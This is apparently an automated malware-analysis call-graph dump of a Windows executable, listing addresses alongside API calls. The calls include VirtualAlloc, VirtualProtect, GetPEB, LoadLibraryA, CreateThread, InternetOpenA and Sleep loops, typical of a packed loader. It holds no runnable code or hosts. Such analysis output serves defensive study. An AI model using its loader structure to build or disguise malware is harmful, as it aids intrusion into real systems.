API calls 4 library calls 37149->37169 37170 4014b0 25 API calls 4 library calls 37152->37170 37156 40248e __InternalCxxFrameHandler 37153->37156 37158 4024b4 37153->37158 37154 40259e 37173 4016a0 27 API calls std::_Xinvalid_argument 37154->37173 37156->37135 37157 4025a3 37174 401600 27 API calls 3 library calls 37157->37174 37158->37154 37159 402508 37158->37159 37160 40252d 37158->37160 37159->37157 37171 401600 27 API calls 4 library calls 37159->37171 37166 402519 __InternalCxxFrameHandler 37160->37166 37172 401600 27 API calls 4 library calls 37160->37172 37162 4025a8 37165 40c26f 25 API calls 37165->37154 37166->37165 37167 402580 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37166->37167 37167->37135 37168->37141 37169->37152 37170->37146 37171->37166 37172->37166 37174->37162 37175 da9cbe 37176 da9ccd 37175->37176 37179 daa45e 37176->37179 37180 daa479 37179->37180 37181 daa482 CreateToolhelp32Snapshot 37180->37181 37182 daa49e Module32First 37180->37182 37181->37180 37181->37182 37183 daa4ad 37182->37183 37184 da9cd6 37182->37184 37186 daa11d 37183->37186 37187 daa148 37186->37187 37188 daa159 VirtualAlloc 37187->37188 37189 daa191 37187->37189 37188->37189 37189->37189 37190 40e268 37193 411ac2 37190->37193 37192 40e280 37194 411af6 _free 37193->37194 37195 411acd RtlFreeHeap 37193->37195 37194->37192 37195->37194 37196 411ae2 37195->37196 37199 40c339 14 API calls __dosmaperr 37196->37199 37198 411ae8 GetLastError 37198->37194 37199->37198 37200 100079ee 37201 10007a2c 37200->37201 37205 100079fc __dosmaperr 37200->37205 37208 10005926 14 API calls __dosmaperr 37201->37208 37202 10007a17 RtlAllocateHeap 37204 10007a2a 37202->37204 37202->37205 37205->37201 37205->37202 37207 10005aed EnterCriticalSection LeaveCriticalSection __dosmaperr 37205->37207 37207->37205 37208->37204 37209 a712e8 37210 a71736 37209->37210 37211 a71bda CreateThread 37210->37211 37212 a71bd5 37210->37212 37211->37212 37213 819b37 37211->37213 37214 402c70 37215 402c94 SetLastError 37214->37215 37216 402cbc 37214->37216 37292 402920 71 API calls 37215->37292 37217 402cc6 37216->37217 37220 402d01 SetLastError 37216->37220 37227 402d29 37216->37227 37293 402920 71 API calls 37217->37293 37219 402ca6 37221 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 37219->37221 37294 402920 71 API calls 37220->37294 37224 402cb8 37221->37224 37225 402cd0 SetLastError 37228 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 37225->37228 37226 402d13 37229 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 37226->37229 37227->37217 37230 402d94 GetNativeSystemInfo 37227->37230 37231 402ced 37228->37231 37232 402d25 37229->37232 37230->37217 37233 402dc3 VirtualAlloc 37230->37233 37234 402e03 GetProcessHeap HeapAlloc 37233->37234 37235 402ddd VirtualAlloc 37233->37235 37236 402e20 VirtualFree 37234->37236 37237 402e34 37234->37237 37235->37234 37238 402def 37235->37238 37236->37237 37239 402e7c SetLastError 37237->37239 37240 402e9e VirtualAlloc 37237->37240 37295 402920 71 API calls 37238->37295 37242 402e84 37239->37242 37250 402eb7 __InternalCxxFrameHandler __cftof 37240->37250 37296 4033d0 16 API calls ___vcrt_freefls@4 37242->37296 37243 402df9 37243->37234 37245 402e8b 37246 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 37245->37246 37247 402e9a 37246->37247 37249 402f9c 37269 402a80 37249->37269 37250->37239 37250->37242 37250->37249 37268 402bf0 VirtualAlloc 37250->37268 37251 403165 37252 402950 77 API calls 37251->37252 37253 403176 37252->37253 37253->37242 37261 40317e 37253->37261 37254 40303c 37254->37242 37254->37251 37277 402950 37254->37277 37256 40320a 37258 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 37256->37258 37257 4031ba 37259 4031f4 37257->37259 37260 4031c5 37257->37260 37262 403220 37258->37262 37263 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 37259->37263 37265 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 37260->37265 37261->37256 37261->37257 37264 403206 37263->37264 37266 4031f0 37265->37266 37268->37250 37270 402bdc 37269->37270 37272 402aa0 37269->37272 37270->37254 37271 402bcb SetLastError 37271->37254 37272->37270 37272->37271 37273 402bae SetLastError 37272->37273 37275 402b8f SetLastError 37272->37275 37273->37254 37275->37254 37278 4029a5 37277->37278 37279 402969 37277->37279 37282 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 37278->37282 37280 402974 37279->37280 37281 4029be VirtualProtect 37279->37281 37280->37278 37297 402c10 VirtualFree 37280->37297 37281->37278 37283 402a02 GetLastError FormatMessageA 37281->37283 37284 4029ba 37282->37284 37285 402a27 37283->37285 37284->37254 37285->37285 37286 402a2e LocalAlloc 37285->37286 37298 4028e0 69 API calls 37286->37298 37288 402a51 OutputDebugStringA LocalFree LocalFree 37289 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 37288->37289 37290 402a77 37289->37290 37290->37254 37292->37219 37293->37225 37294->37226 37295->37243 37296->37245 37297->37278 37298->37288 37299 a92e79 37300 a92e7e VirtualProtect 37299->37300 37301 a92ea9 37300->37301 37302 10005bf4 37303 10007a3c _free 14 API calls 37302->37303 37304 10005c0c 37303->37304 37305 e9003c 37306 e90049 37305->37306 37320 e90e0f SetErrorMode SetErrorMode 37306->37320 37311 e90265 37312 e902ce VirtualProtect 37311->37312 37313 e9030b 37312->37313 37314 e90439 VirtualFree 37313->37314 37318 e905f4 LoadLibraryA 37314->37318 37319 e904be 37314->37319 37315 e904e3 LoadLibraryA 37315->37319 37317 e908c7 37318->37317 37319->37315 37319->37318 37321 e90223 37320->37321 37322 e90d90 37321->37322 37323 e90dad 37322->37323 37324 e90dbb GetPEB 37323->37324 37325 e90238 VirtualAlloc 37323->37325 37324->37325 37325->37311 37326 40955c 37327 409568 __FrameHandler3::FrameUnwindToState 37326->37327 37354 4092bc 37327->37354 37329 40956f 37330 4096c2 37329->37330 37341 409599 ___scrt_is_nonwritable_in_current_image __CreateFrameInfo ___scrt_release_startup_lock 37329->37341 37382 4097b2 4 API calls 2 library calls 37330->37382 37332 4096c9 37383 40f00b 37332->37383 37336 4096d7 37337 4095b8 37338 409639 37362 4098cd 37338->37362 37341->37337 37341->37338 37378 40efe5 37 API calls 2 library calls 37341->37378 37355 4092c5 37354->37355 37387 4099b3 IsProcessorFeaturePresent 37355->37387 37357 4092d1 37388 40ab6a 10 API calls 2 library calls 37357->37388 37359 4092d6 37360 4092da 37359->37360 37389 40ab89 7 API calls 2 library calls 37359->37389 37360->37329 37390 40aa10 37362->37390 37365 40963f 37366 410b89 37365->37366 37392 4167a2 37366->37392 37368 409647 37371 408020 37368->37371 37369 410b92 37369->37368 37398 416a47 37 API calls 37369->37398 37372 402470 27 API calls 37371->37372 37373 408055 37372->37373 37374 402470 27 API calls 37373->37374 37375 40807a 37374->37375 37401 4055c0 37375->37401 37378->37338 37382->37332 38134 40eea9 37383->38134 37386 40efcf 23 API calls __CreateFrameInfo 37386->37336 37387->37357 37388->37359 37389->37360 37391 4098e0 GetStartupInfoW 37390->37391 37391->37365 37393 4167dd 37392->37393 37394 4167ab 37392->37394 37393->37369 37399 4112ba 37 API calls 3 library calls 37394->37399 37396 4167ce 37400 4165e9 47 API calls 2 library calls 37396->37400 37398->37369 37399->37396 37400->37393 37820 40f20b 37401->37820 37406 402470 27 API calls 37407 40564e std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37406->37407 37408 402470 27 API calls 37407->37408 37436 4056b9 __cftof std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37407->37436 37408->37436 37410 409035 27 API calls 37410->37436 37411 405a91 37826 4064d0 37411->37826 37414 405ab2 37836 4022d0 37414->37836 37415 402470 27 API calls 37415->37436 37418 405ac2 37840 402200 37418->37840 37422 405ad6 37423 405bab 37422->37423 37424 405ade 37422->37424 37952 406770 39 API calls 2 library calls 37423->37952 37429 405af1 37424->37429 37430 405b4e 37424->37430 37427 40c26f 25 API calls 37427->37436 37428 405bb0 37437 4022d0 27 API calls 37428->37437 37942 406550 39 API calls 2 library calls 37429->37942 37947 406660 39 API calls 2 library calls 37430->37947 37431 405a45 Sleep 37431->37436 37434 405b53 37439 4022d0 27 API calls 37434->37439 37435 405af6 37440 4022d0 27 API calls 37435->37440 37436->37410 37436->37411 37436->37415 37436->37427 37436->37431 37443 405a6a 37436->37443 37450 405a3b std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37436->37450 37454 405a51 37436->37454 37907 40f158 41 API calls 37436->37907 37908 409170 6 API calls 37436->37908 37909 409482 28 API calls 37436->37909 37910 409126 RtlEnterCriticalSection RtlLeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 37436->37910 37911 408a60 37436->37911 37916 401d60 37436->37916 37438 405bc0 37437->37438 37444 402200 25 API calls 37438->37444 37441 405b63 37439->37441 37442 405b06 37440->37442 37948 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37441->37948 37943 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37442->37943 37940 408440 27 API calls 37443->37940 37445 405bd4 37444->37445 37451 405caa 37445->37451 37452 405bdc 37445->37452 37449 405b0f 37456 402200 25 API calls 37449->37456 37450->37431 37961 406b10 39 API calls 2 library calls 37451->37961 37953 4067f0 39 API calls 2 library calls 37452->37953 37453 405b6c 37459 402200 25 API calls 37453->37459 37454->37443 37932 4037d0 37454->37932 37455 405a76 37461 402200 25 API calls 37455->37461 37463 405b17 37456->37463 37466 405b74 37459->37466 37462 405a7e 37461->37462 37467 402200 25 API calls 37462->37467 37944 4065e0 39 API calls 2 library calls 37463->37944 37464 405be1 37474 4022d0 27 API calls 37464->37474 37465 405caf 37475 4022d0 27 API calls 37465->37475 37949 4066f0 39 API calls 2 library calls 37466->37949 37470 405a86 37467->37470 37941 401710 CoUninitialize 37470->37941 37471 405b1c 37478 4022d0 27 API calls 37471->37478 37472 405b79 37480 4022d0 27 API calls 37472->37480 37476 405bf1 37474->37476 37477 405cbf 37475->37477 37954 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37476->37954 37487 402200 25 API calls 37477->37487 37481 405b2c 37478->37481 37483 405b89 37480->37483 37945 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37481->37945 37482 405bfa 37486 402200 25 API calls 37482->37486 37950 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37483->37950 37490 405c02 37486->37490 37491 405cd3 37487->37491 37488 405b92 37493 402200 25 API calls 37488->37493 37489 405b35 37494 402200 25 API calls 37489->37494 37955 406870 39 API calls 2 library calls 37490->37955 37492 405d94 37491->37492 37962 406b90 39 API calls 2 library calls 37491->37962 37970 406eb0 39 API calls 2 library calls 37492->37970 37498 405b9a 37493->37498 37499 405b3d 37494->37499 37951 408440 27 API calls 37498->37951 37946 408440 27 API calls 37499->37946 37500 405c07 37506 4022d0 27 API calls 37500->37506 37501 405ce0 37508 4022d0 27 API calls 37501->37508 37502 405d9e 37509 4022d0 27 API calls 37502->37509 37505 405b49 37848 4016b0 37505->37848 37507 405c17 37506->37507 37956 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37507->37956 37512 405cf0 37508->37512 37513 405dae 37509->37513 37963 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37512->37963 37523 402200 25 API calls 37513->37523 37514 406136 37852 407c30 37514->37852 37515 405c20 37518 402200 25 API calls 37515->37518 37521 405c28 37518->37521 37519 405cf9 37522 402200 25 API calls 37519->37522 37520 40613f 37530 4022d0 27 API calls 37520->37530 37957 4068f0 39 API calls 2 library calls 37521->37957 37525 405d01 37522->37525 37526 405dc2 37523->37526 37964 406c10 39 API calls 2 library calls 37525->37964 37529 405ea9 37526->37529 37971 406f30 39 API calls 2 library calls 37526->37971 37527 405c2d 37539 4022d0 27 API calls 37527->37539 37981 4072d0 39 API calls 2 library calls 37529->37981 37531 406152 37530->37531 37862 407bb0 37531->37862 37533 405d06 37541 4022d0 27 API calls 37533->37541 37536 405eb3 37544 4022d0 27 API calls 37536->37544 37537 405dcf 37543 4022d0 27 API calls 37537->37543 37538 40615d 37547 4022d0 27 API calls 37538->37547 37540 405c3d 37539->37540 37552 402200 25 API calls 37540->37552 37542 405d16 37541->37542 37965 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37542->37965 37546 405ddf 37543->37546 37548 405ec3 37544->37548 37972 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37546->37972 37551 406170 37547->37551 37559 402200 25 API calls 37548->37559 37549 405d1f 37553 402200 25 API calls 37549->37553 37872 407b10 37551->37872 37556 405c51 37552->37556 37560 405d27 37553->37560 37554 405de8 37561 402200 25 API calls 37554->37561 37557 405c72 37556->37557 37558 405c55 37556->37558 37959 406a00 39 API calls 2 library calls 37557->37959 37958 406980 39 API calls 2 library calls 37558->37958 37564 405ed7 37559->37564 37966 406c90 39 API calls 2 library calls 37560->37966 37566 405df0 37561->37566 37562 40617b 37577 4022d0 27 API calls 37562->37577 37569 405f59 37564->37569 37570 405edb 37564->37570 37973 406fb0 39 API calls 2 library calls 37566->37973 37568 405c5a 37581 4022d0 27 API calls 37568->37581 37988 4074f0 39 API calls 2 library calls 37569->37988 37982 407360 39 API calls 2 library calls 37570->37982 37571 405d2c 37582 4022d0 27 API calls 37571->37582 37573 405c77 37583 4022d0 27 API calls 37573->37583 37576 405df5 37587 4022d0 27 API calls 37576->37587 37580 40618e 37577->37580 37578 405f5e 37590 4022d0 27 API calls 37578->37590 37579 405ee0 37591 4022d0 27 API calls 37579->37591 37882 408560 37580->37882 37585 405c6a 37581->37585 37586 405d3c 37582->37586 37588 405c87 37583->37588 38007 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37585->38007 37603 402200 25 API calls 37586->37603 37592 405e05 37587->37592 37599 402200 25 API calls 37588->37599 37596 405f6e 37590->37596 37597 405ef0 37591->37597 37974 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37592->37974 37594 4061bb 37890 408670 37594->37890 37613 402200 25 API calls 37596->37613 37983 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37597->37983 37605 405c9b 37599->37605 37601 40611b 37607 402200 25 API calls 37601->37607 37609 405d50 37603->37609 37604 405e0e 37610 402200 25 API calls 37604->37610 37605->37505 37960 406a90 39 API calls 2 library calls 37605->37960 37607->37505 37608 405ef9 37614 402200 25 API calls 37608->37614 37615 405d54 37609->37615 37616 405d5e 37609->37616 37611 405e16 37610->37611 37975 407030 39 API calls 2 library calls 37611->37975 37612 4085c0 27 API calls 37621 4061e8 37612->37621 37622 405f82 37613->37622 37623 405f01 37614->37623 37967 406d20 39 API calls 2 library calls 37615->37967 37968 406da0 39 API calls 2 library calls 37616->37968 37626 408670 27 API calls 37621->37626 37627 406004 37622->37627 37628 405f86 37622->37628 37984 4073e0 39 API calls 2 library calls 37623->37984 37624 405e1b 37637 4022d0 27 API calls 37624->37637 37625 405d63 37638 4022d0 27 API calls 37625->37638 37630 4061fd 37626->37630 37995 407700 39 API calls 2 library calls 37627->37995 37989 407580 39 API calls 2 library calls 37628->37989 37634 4085c0 27 API calls 37630->37634 37633 405f06 37640 4022d0 27 API calls 37633->37640 37639 406215 37634->37639 37635 406009 37644 4022d0 27 API calls 37635->37644 37636 405f8b 37645 4022d0 27 API calls 37636->37645 37641 405e2b 37637->37641 37642 405d73 37638->37642 37643 402200 25 API calls 37639->37643 37646 405f16 37640->37646 37976 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37641->37976 37657 402200 25 API calls 37642->37657 37648 406223 37643->37648 37649 406019 37644->37649 37650 405f9b 37645->37650 37985 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37646->37985 37653 402200 25 API calls 37648->37653 37664 402200 25 API calls 37649->37664 37990 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37650->37990 37652 405e34 37656 402200 25 API calls 37652->37656 37658 40622e 37653->37658 37655 405f1f 37660 402200 25 API calls 37655->37660 37661 405e3c 37656->37661 37662 405d87 37657->37662 37663 402200 25 API calls 37658->37663 37659 405fa4 37665 402200 25 API calls 37659->37665 37666 405f27 37660->37666 37977 4070b0 39 API calls 2 library calls 37661->37977 37662->37505 37969 406e30 39 API calls 2 library calls 37662->37969 37668 406239 37663->37668 37669 40602d 37664->37669 37670 405fac 37665->37670 37986 407470 39 API calls 2 library calls 37666->37986 37674 402200 25 API calls 37668->37674 37676 406031 37669->37676 37677 406084 37669->37677 37991 407600 39 API calls 2 library calls 37670->37991 37672 405e41 37687 4022d0 27 API calls 37672->37687 37675 406244 37674->37675 37680 402200 25 API calls 37675->37680 37996 407790 39 API calls 2 library calls 37676->37996 38001 407910 39 API calls 2 library calls 37677->38001 37679 405f2c 37690 4022d0 27 API calls 37679->37690 37685 40624f 37680->37685 37682 405fb1 37692 4022d0 27 API calls 37682->37692 37684 406089 37694 4022d0 27 API calls 37684->37694 37689 402200 25 API calls 37685->37689 37686 406036 37696 4022d0 27 API calls 37686->37696 37688 405e51 37687->37688 37699 402200 25 API calls 37688->37699 37691 40625a 37689->37691 37693 405f3c 37690->37693 37695 402200 25 API calls 37691->37695 37697 405fc1 37692->37697 37987 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37693->37987 37700 406099 37694->37700 37701 406265 37695->37701 37702 406046 37696->37702 37992 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37697->37992 37706 405e65 37699->37706 37716 402200 25 API calls 37700->37716 37707 402200 25 API calls 37701->37707 37997 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37702->37997 37704 405f45 37705 402200 25 API calls 37704->37705 37705->37505 37711 405e6e 37706->37711 37978 407140 39 API calls 2 library calls 37706->37978 37751 406274 37707->37751 37709 405fca 37710 402200 25 API calls 37709->37710 37714 405fd2 37710->37714 37979 4071c0 39 API calls 2 library calls 37711->37979 37712 40604f 37713 402200 25 API calls 37712->37713 37718 406057 37713->37718 37993 407680 39 API calls 2 library calls 37714->37993 37720 4060ad 37716->37720 37998 407810 39 API calls 2 library calls 37718->37998 37720->37505 38002 407990 39 API calls 2 library calls 37720->38002 37721 405e78 37727 4022d0 27 API calls 37721->37727 37723 405fd7 37728 4022d0 27 API calls 37723->37728 37724 40605c 37731 4022d0 27 API calls 37724->37731 37726 4060b6 37735 4022d0 27 API calls 37726->37735 37730 405e88 37727->37730 37732 405fe7 37728->37732 37729 4062d9 Sleep 37729->37751 37737 402200 25 API calls 37730->37737 37733 40606c 37731->37733 37994 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37732->37994 37999 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37733->37999 37740 4060c6 37735->37740 37736 4022d0 27 API calls 37736->37751 37742 405e9c 37737->37742 37739 405ff0 37744 402200 25 API calls 37739->37744 38003 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37740->38003 37742->37505 37980 407250 39 API calls 2 library calls 37742->37980 37743 406075 37746 402200 25 API calls 37743->37746 37744->37505 37745 4060cf 37747 402200 25 API calls 37745->37747 37749 40607d 37746->37749 37750 4060d7 37747->37750 38000 407890 39 API calls 2 library calls 37749->38000 38004 407a10 39 API calls 2 library calls 37750->38004 37751->37729 37751->37736 37752 4062e2 37751->37752 37758 4062d1 37751->37758 37755 402200 25 API calls 37752->37755 37757 4062ea 37755->37757 37756 4060dc 37765 4022d0 27 API calls 37756->37765 37893 408490 37757->37893 37761 402200 25 API calls 37758->37761 37760 406082 37764 4022d0 27 API calls 37760->37764 37761->37729 37762 4062fe 37763 408490 27 API calls 37762->37763 37766 406317 37763->37766 37764->37585 37767 4060ec 37765->37767 37768 408490 27 API calls 37766->37768 38005 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37767->38005 37773 40632a 37768->37773 37770 4060f5 37771 402200 25 API calls 37770->37771 37772 4060fd 37771->37772 38006 407a90 39 API calls 2 library calls 37772->38006 37775 408490 27 API calls 37773->37775 37777 406352 37773->37777 37775->37777 38008 407cc0 39 API calls 2 library calls 37777->38008 37778 40635f 37779 4022d0 27 API calls 37778->37779 37780 40636f 37779->37780 37781 402200 25 API calls 37780->37781 37782 406383 37781->37782 37783 406420 37782->37783 37785 4016b0 27 API calls 37782->37785 38011 407e30 39 API calls 2 library calls 37783->38011 37787 40639e 37785->37787 37786 406425 37790 4022d0 27 API calls 37786->37790 38009 407d50 39 API calls 2 library calls 37787->38009 37789 4063a7 37792 4022d0 27 API calls 37789->37792 37791 406438 37790->37791 37793 402200 25 API calls 37791->37793 37795 4063b7 37792->37795 37794 40644f 37793->37794 37819 4064af 37794->37819 38012 407fa0 39 API calls 2 library calls 37794->38012 37800 4063e7 37795->37800 37801 4063d8 Sleep 37795->37801 37796 4037d0 39 API calls 37798 4064c0 37796->37798 37799 406460 37803 4022d0 27 API calls 37799->37803 37806 4022d0 27 API calls 37800->37806 37801->37795 37802 4063e5 37801->37802 37804 406409 37802->37804 37805 40646f 37803->37805 37807 402200 25 API calls 37804->37807 38013 407f20 39 API calls 2 library calls 37805->38013 37809 4063fe 37806->37809 37810 406411 37807->37810 37812 402200 25 API calls 37809->37812 38010 401710 CoUninitialize 37810->38010 37811 406483 37814 4022d0 27 API calls 37811->37814 37812->37804 37815 406492 37814->37815 38014 407ec0 39 API calls __Init_thread_footer 37815->38014 37817 4064a0 37818 4022d0 27 API calls 37817->37818 37818->37819 37819->37796 38015 40f188 37820->38015 37822 40560f 37823 40f042 37822->37823 38026 4111fd GetLastError 37823->38026 37827 40652e 37826->37827 37828 4064fc 37826->37828 37830 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 37827->37830 38064 409170 6 API calls 37828->38064 37832 406540 37830->37832 37831 406506 37831->37827 38065 409482 28 API calls 37831->38065 37832->37414 37834 406524 38066 409126 RtlEnterCriticalSection RtlLeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 37834->38066 37837 4022f3 37836->37837 37837->37837 37838 402470 27 API calls 37837->37838 37839 402305 37838->37839 37839->37418 37841 40220b 37840->37841 37842 402226 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37840->37842 37841->37842 37843 40c26f 25 API calls 37841->37843 37842->37422 37844 40224a 37843->37844 37845 402281 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37844->37845 37846 40c26f 25 API calls 37844->37846 37845->37422 37847 4022cc 37846->37847 37849 4016c3 __cftof 37848->37849 37850 409035 27 API calls 37849->37850 37851 4016da __cftof 37850->37851 37851->37514 37853 407c9e 37852->37853 37854 407c62 37852->37854 37856 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 37853->37856 38067 409170 6 API calls 37854->38067 37858 407cb0 37856->37858 37857 407c6c 37857->37853 38068 409482 28 API calls 37857->38068 37858->37520 37860 407c94 38069 409126 RtlEnterCriticalSection RtlLeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 37860->38069 37863 407bdc 37862->37863 37871 407c0e 37862->37871 38070 409170 6 API calls 37863->38070 37865 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 37866 407c20 37865->37866 37866->37538 37867 407be6 37867->37871 38071 409482 28 API calls 37867->38071 37869 407c04 38072 409126 RtlEnterCriticalSection RtlLeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 37869->38072 37871->37865 37873 407b92 37872->37873 37874 407b4d 37872->37874 37876 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 37873->37876 38073 409170 6 API calls 37874->38073 37878 407ba5 37876->37878 37877 407b57 37877->37873 38074 409482 28 API calls 37877->38074 37878->37562 37880 407b88 38075 409126 RtlEnterCriticalSection RtlLeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 37880->38075 37883 408572 37882->37883 37884 408a60 27 API calls 37883->37884 37885 4061a3 37884->37885 37886 4085c0 37885->37886 37887 4085d9 37886->37887 37888 4085ed __InternalCxxFrameHandler 37887->37888 38076 402740 27 API calls 3 library calls 37887->38076 37888->37594 38077 408880 37890->38077 37892 4061d0 37892->37612 37894 4084bb 37893->37894 37895 4084c2 37894->37895 37896 408514 37894->37896 37897 4084f5 37894->37897 37895->37762 37904 408509 __InternalCxxFrameHandler 37896->37904 38099 401600 27 API calls 4 library calls 37896->38099 37898 40854a 37897->37898 37899 4084fc 37897->37899 38100 401600 27 API calls 3 library calls 37898->38100 38098 401600 27 API calls 4 library calls 37899->38098 37903 408502 37903->37904 37905 40c26f 25 API calls 37903->37905 37904->37762 37906 408554 37905->37906 37907->37436 37908->37436 37909->37436 37910->37436 37912 408ae8 37911->37912 37915 408a7a __InternalCxxFrameHandler 37911->37915 38101 408b10 27 API calls 3 library calls 37912->38101 37914 408afa 37914->37436 37915->37436 37917 401db2 37916->37917 37917->37917 37918 402470 27 API calls 37917->37918 37919 401dc5 37918->37919 37920 402470 27 API calls 37919->37920 37921 401e8d __InternalCxxFrameHandler 37920->37921 38102 40c34c 37921->38102 37924 402033 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37926 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 37924->37926 37925 401fc3 37925->37924 37927 402062 37925->37927 37928 402057 37926->37928 37929 40c26f 25 API calls 37927->37929 37928->37436 37930 402067 37929->37930 37931 401d60 39 API calls 37930->37931 37933 40f00b 23 API calls 37932->37933 37934 4037d7 37933->37934 38131 4082a0 27 API calls 3 library calls 37934->38131 37936 4038a1 37936->37443 37938 403844 37938->37936 38132 40f021 37 API calls _unexpected 37938->38132 38133 408740 27 API calls 3 library calls 37938->38133 37940->37455 37942->37435 37943->37449 37944->37471 37945->37489 37946->37505 37947->37434 37948->37453 37949->37472 37950->37488 37951->37505 37952->37428 37953->37464 37954->37482 37955->37500 37956->37515 37957->37527 37958->37568 37959->37573 37960->37568 37961->37465 37962->37501 37963->37519 37964->37533 37965->37549 37966->37571 37967->37568 37968->37625 37969->37492 37970->37502 37971->37537 37972->37554 37973->37576 37974->37604 37975->37624 37976->37652 37977->37672 37978->37711 37979->37721 37980->37529 37981->37536 37982->37579 37983->37608 37984->37633 37985->37655 37986->37679 37987->37704 37988->37578 37989->37636 37990->37659 37991->37682 37992->37709 37993->37723 37994->37739 37995->37635 37996->37686 37997->37712 37998->37724 37999->37743 38000->37760 38001->37684 38002->37726 38003->37745 38004->37756 38005->37770 38006->37760 38007->37601 38008->37778 38009->37789 38011->37786 38012->37799 38013->37811 38014->37817 38016 40f197 38015->38016 38017 40f1ac 38015->38017 38023 40c339 14 API calls __dosmaperr 38016->38023 38022 40f1a7 __alldvrm 38017->38022 38025 411df2 6 API calls _unexpected 38017->38025 38019 40f19c 38024 40c25f 25 API calls _mbstowcs 38019->38024 38022->37822 38023->38019 38024->38022 38025->38022 38027 41121a 38026->38027 38028 411214 38026->38028 38032 411220 SetLastError 38027->38032 38057 411db0 6 API calls _unexpected 38027->38057 38056 411d71 6 API calls _unexpected 38028->38056 38031 411238 38031->38032 38033 41123c 38031->38033 38039 4112b4 38032->38039 38040 405618 Sleep 38032->38040 38058 411a65 14 API calls 2 library calls 38033->38058 38035 411248 38037 411250 38035->38037 38038 411267 38035->38038 38059 411db0 6 API calls _unexpected 38037->38059 38060 411db0 6 API calls _unexpected 38038->38060 38063 40fad9 37 API calls __CreateFrameInfo 38039->38063 38040->37406 38045 411273 38046 411277 38045->38046 38047 411288 38045->38047 38061 411db0 6 API calls _unexpected 38046->38061 38062 41102b 14 API calls _unexpected 38047->38062 38049 411ac2 _free 14 API calls 38052 411264 38049->38052 38051 411293 38054 411ac2 _free 14 API calls 38051->38054 38052->38032 38053 41125e 38053->38049 38055 41129a 38054->38055 38055->38032 38056->38027 38057->38031 38058->38035 38059->38053 38060->38045 38061->38053 38062->38051 38064->37831 38065->37834 38066->37827 38067->37857 38068->37860 38069->37853 38070->37867 38071->37869 38072->37871 38073->37877 38074->37880 38075->37873 38076->37888 38078 4088c3 38077->38078 38079 408a50 38078->38079 38080 408990 38078->38080 38081 4088c8 __InternalCxxFrameHandler 38078->38081 38096 4016a0 27 API calls std::_Xinvalid_argument 38079->38096 38084 4089c5 38080->38084 38087 4089eb 38080->38087 38081->37892 38083 408a55 38097 401600 27 API calls 3 library calls 38083->38097 38084->38083 38086 4089d0 38084->38086 38094 401600 27 API calls 4 library calls 38086->38094 38093 4089dd __InternalCxxFrameHandler 38087->38093 38095 401600 27 API calls 4 library calls 38087->38095 38088 4089d6 38091 40c26f 25 API calls 38088->38091 38088->38093 38092 408a5f 38091->38092 38093->37892 38094->38088 38095->38093 38097->38088 38098->37903 38099->37904 38100->37903 38101->37914 38105 41144f 38102->38105 38108 411463 38105->38108 38106 411467 38123 401ed8 InternetOpenA 38106->38123 38124 40c339 14 API calls __dosmaperr 38106->38124 38108->38106 38110 4114a1 38108->38110 38108->38123 38109 411491 38125 40c25f 25 API calls _mbstowcs 38109->38125 38126 40c369 37 API calls 2 library calls 